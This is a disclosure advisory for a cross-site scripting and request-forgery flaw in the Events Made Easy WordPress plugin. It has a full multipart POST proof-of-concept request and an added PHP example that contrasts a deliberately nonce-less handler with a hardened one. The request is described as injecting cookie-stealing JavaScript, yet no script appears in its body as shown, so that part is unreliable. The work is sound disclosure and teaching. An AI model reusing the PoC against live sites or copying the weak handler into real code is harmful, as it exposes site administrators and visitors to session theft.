------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Events Made Easy WordPress plugin
------------------------------------------------------------------------

Job Diesveld, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------

A Cross-Site Scripting vulnerability has been found in the Events Made Easy WordPress plugin. Using this issue, an attacker can create a specially crafted event which, when posted to WordPress, injects malicious JavaScript code into the application. This code will execute within the browser of any user who views the relevant application content.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------

OVE-20160729-0001

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------

This issue has been fixed in Events Made Easy [2] plugin version 1.6.21.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------

This issue was successfully tested on Events Made Easy [3] plugin version 1.6.20.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------

The WordPress Events Made Easy [3] plugin is a full-featured event management solution for WordPress. It supports public, private, draft and recurring events, locations management, RSVP (+ optional approval), Paypal, 2Checkout, FirstData and Google maps.

When adding a new Events Made Easy event within the WordPress admin interface, the plugin allows script code to be entered in, among others, the Single Event Format textbox. The plugin does not sufficiently check the nonces closedpostboxesnonce and meta-box-order-nonce when the event is posted to the server, nor is any other nonce employed to prevent Cross-Site Request Forgery (CSRF). If an attacker can lure a WordPress admin into posting an event with malicious script code, this code is stored in the application and can subsequently be used to perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

https://sumofpwn.nl/advisory/2016/poc-1.png

------------------------------------------------------------------------
Proof of Concept
------------------------------------------------------------------------

The following request can be used to create an event containing JavaScript that will obtain the cookie of the current user:

POST /wp-admin/admin.php?page=events-manager&eme_admin_action=update_event&event_id=16 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie:
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------224523339434990794855940370
Content-Length: 8579

-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_status"

5
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_contactperson_id"

-1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_seats"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="price"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="currency"

EUR
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_max_allowed"

10
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_min_allowed"

1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_rsvp_discount"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_rsvp_discountgroup"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="rsvp_number_days"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="rsvp_number_hours"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_rsvp_end_target"

start
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_name"

fooname
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_slug"

fooname
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_recurrence_date"

07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_start_date"

2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_recurrence_end_date"

07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_end_date"

2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_freq"

daily
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_interval"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_byweekno"

1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_byday"

1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_event_start_date"

07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_start_date"

2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_event_end_date"

07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_end_date"

2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_start_time"

01:22PM
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_end_time"

01:22PM
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_page_title_format_tpl"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_page_title_format"

lalalala
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_single_event_format_tpl"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_single_event_format"

#_STARTDATE - #_STARTTIME

#_TOWN

#_NOTES

#_ADDBOOKINGFORM

#_MAP

-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_contactperson_email_body_tpl"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_contactperson_email_body"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_registration_recorded_ok_html_tpl"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_registration_recorded_ok_html"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_respondent_email_body_tpl"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_respondent_email_body"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_registration_pending_email_body_tpl"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_registration_pending_email_body"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_registration_updated_email_body_tpl"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_registration_updated_email_body"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_registration_cancelled_email_body_tpl"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_registration_cancelled_email_body"

Dear #_RESPNAME,

Your request to reserve #_RESPSPACES space(s) for #_EVENTNAME has been cancelled.

Yours faithfully,awfe
#_CONTACTPERSON
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_registration_denied_email_body_tpl"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_registration_denied_email_body"

Dear #_RESPNAME,

Your request to reserve #_RESPSPACES space(s) for #_EVENTNAME has been denied.

Yours faithfully,
#_CONTACTPERSONawef
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_registration_form_format_tpl"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_registration_form_format"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_cancel_form_format_tpl"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_cancel_form_format"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_name"

piet
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_address"

kaas
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_town"

foo
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_latitude"

57.198
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_longitude"

9.67063
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="content"

gold
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_image_url"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_image_id"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_url"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_update_button"

Update »
-----------------------------224523339434990794855940370

------------------------------------------------------------------------
References
------------------------------------------------------------------------

[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_events_made_easy_wordpress_plugin.html
[2] https://downloads.wordpress.org/plugin/events-made-easy.1.6.21.zip
[3] https://wordpress.org/plugins/events-made-easy/
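------------------------------------------------------------------------
Hardened handler (added example)
------------------------------------------------------------------------

The PHP below is an added illustration written for this page; it is not code from the Events Made Easy plugin or from the advisory author. It shows, for a minimal WordPress admin form handler, the weak pattern the advisory describes (an update_event POST accepted without any nonce) next to a hardened version that ties the form to a WordPress nonce, checks the caller's capability and filters the stored markup. All function names, the nonce action and field name ('eme_demo_update_event', 'eme_demo_nonce'), the option name and the hook are assumptions made for this example; only the WordPress core functions it calls (wp_nonce_field, check_admin_referer, current_user_can, wp_unslash, wp_kses_post, update_option, wp_die) are real.

```php
<?php
// Added illustration, not the plugin's own code. Every eme_demo_* name,
// the nonce action/field and the option name are assumptions; the WordPress
// core calls are real.

// WEAK PATTERN: any POST that reaches the admin page is trusted. An
// administrator lured onto an attacker-controlled page can be made to
// submit this form cross-site, and whatever arrives in the format field is
// stored verbatim and later rendered for every visitor of the event page.
function eme_demo_update_event_weak() {
    if ( empty( $_POST['event_update_button'] ) ) {
        return;
    }
    $format = isset( $_POST['event_single_event_format'] )
        ? wp_unslash( $_POST['event_single_event_format'] )
        : '';
    update_option( 'eme_demo_single_event_format', $format ); // stored as-is
}

// HARDENED: the form carries a nonce bound to this action and to the
// logged-in user. A cross-site page cannot read that value, so a forged
// request fails before anything is stored.
function eme_demo_render_form() {
    echo '<form method="post">';
    wp_nonce_field( 'eme_demo_update_event', 'eme_demo_nonce' );
    echo '<textarea name="event_single_event_format"></textarea>';
    echo '<input type="submit" name="event_update_button" value="Update">';
    echo '</form>';
}

function eme_demo_update_event_hardened() {
    if ( empty( $_POST['event_update_button'] ) ) {
        return;
    }

    // Dies with WordPress's "link has expired" page when the nonce is
    // missing, expired, or minted for another action or another user.
    check_admin_referer( 'eme_demo_update_event', 'eme_demo_nonce' );

    // A nonce proves intent, not authorisation: still check the capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die(
            esc_html__( 'Insufficient permissions.', 'eme-demo' ),
            '',
            array( 'response' => 403 )
        );
    }

    $format = isset( $_POST['event_single_event_format'] )
        ? wp_unslash( $_POST['event_single_event_format'] )
        : '';

    // wp_kses_post() keeps the markup a template needs (p, a, img, ...)
    // and strips <script>, on* event handlers and javascript: URLs. It does
    // not touch plain-text placeholders such as #_STARTDATE or #_MAP.
    $format = wp_kses_post( $format );

    update_option( 'eme_demo_single_event_format', $format );
}

// Hook name assumed for the example; a real plugin would register the
// handler on its own admin page callback.
add_action( 'admin_init', 'eme_demo_update_event_hardened' );
```

The nonce check is the part that actually stops the attack described in this advisory. On a single-site install an administrator holds the unfiltered_html capability, so WordPress core will not strip <script> from content an administrator saves; the only thing separating a legitimate update from a forged one is proof that the administrator intentionally submitted this particular form, which is what the nonce provides. wp_kses_post() is defence in depth for the case where a lower-privileged role is later allowed to edit the format.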